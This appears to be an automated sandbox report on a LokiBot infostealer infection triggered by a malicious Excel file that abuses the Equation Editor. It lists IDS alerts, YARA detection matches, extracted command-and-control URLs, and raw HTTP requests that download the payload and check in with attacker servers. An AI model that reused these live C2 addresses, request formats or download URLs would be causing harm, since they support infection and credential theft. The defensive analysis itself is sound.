Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49226 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49226
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49227 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49227
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49228 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49228
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49229 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49229
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49230 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49230
Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Date: Mon, 17 Jul 2023 06:02:40 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Sun, 16 Jul 2023 23:20:35 GMT
ETag: "4e600-600a2eddd1688"
Accept-Ranges: bytes
Content-Length: 321024
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Source: global traffic HTTP traffic detected:
GET /Desktop/dwmfs.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 185.252.179.165
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
POST /mous/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 171.22.30.147
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: BDC1654
Content-Length: 176
Connection: close
Source: global traffic HTTP traffic detected:
POST /mous/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 171.22.30.147
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: BDC1654
Content-Length: 149
Connection: close
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640505
Source: Joe Sandbox View ASN Name: LVLT-10753US LVLT-10753US
Source: Joe Sandbox View IP Address: 171.22.30.147 171.22.30.147
Source: EQNEDT32.EXE, 00000002.00000003.1065602764.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.1065602764.0000000000571000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000002.1246336093.0000000000697000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1242959384.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1246040023.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1245936757.0000000000694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exe
Source: EQNEDT32.EXE, 0000000C.00000002.1246336093.0000000000697000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1246040023.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1245936757.0000000000694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exe$
Source: EQNEDT32.EXE, 0000000C.00000003.1242959384.00000000006E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.1069342874.0000000000571000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.1065602764.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exeT
Source: EQNEDT32.EXE, 00000002.00000002.1069342874.0000000000571000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.1065602764.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exeU
Source: EQNEDT32.EXE, 00000002.00000002.1070068868.0000000003640000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000002.1246831626.0000000003590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exej
Source: EQNEDT32.EXE, 00000002.00000003.1065602764.0000000000583000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.1069342874.0000000000583000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000002.1246336093.0000000000697000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1246040023.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1245936757.0000000000694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exejjC:
Source: EQNEDT32.EXE, 00000002.00000003.1065602764.00000000005B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exetC:
Source: IBM_Centosie.exe, IBM_Centosie.exe, 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, IBM_Centosie.exe, 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, IBM_Centosie.exe, 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4ACE1A76.emf
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640505
Source: global traffic HTTP traffic detected: GET /Desktop/dwmfs.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 185.252.179.165
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: EQNEDT32.EXE, 00000002.00000002.1069342874.000000000055C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comZ& equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.1069342874.000000000055C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: unknown HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 171.22.30.147
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: BDC1654
Content-Length: 176
Connection: close

System Summary

Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1285971294.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: IBM_Centosie.exe PID: 2644, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Screenshot number: 4 Screenshot OCR: document is protected jig 1"\ Op"" 'he g xwmtm h H$ dcKWMn: CKKC mo hooq enoumc MKmr cr . , ,, , ,
Source: Screenshot number: 12 Screenshot OCR: document is protected jig 1"\ Op"" 'he g xwmtm h H$ dcKWMn: CKKC mo hooq enoumc MKmr cr . , ,, , ,
Source: Document image extraction number: 0 Screenshot OCR: document is protected (D Open the ckkumerk h Mkmtcok OfEcF Phenevmq onlne b 2 m m'ldde hr pro:
Source: MV_TRANS-ASIA_I.xls OLE: Microsoft Word 2007+
Source: ~WRF{9E2CC624-EAF0-4813-82C9-76A9DA993D34}.tmp.6.dr OLE: Microsoft Excel 2007+
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dwmfs[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0040549C 5_2_0040549C
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_004029D4 5_2_004029D4
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00262C3B 5_2_00262C3B
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00265703 5_2_00265703
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00406A59 14_2_00406A59
Source: 819E.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{9E2CC624-EAF0-4813-82C9-76A9DA993D34}.tmp.6.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Memory allocated: 77740000 page execute and read and write
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
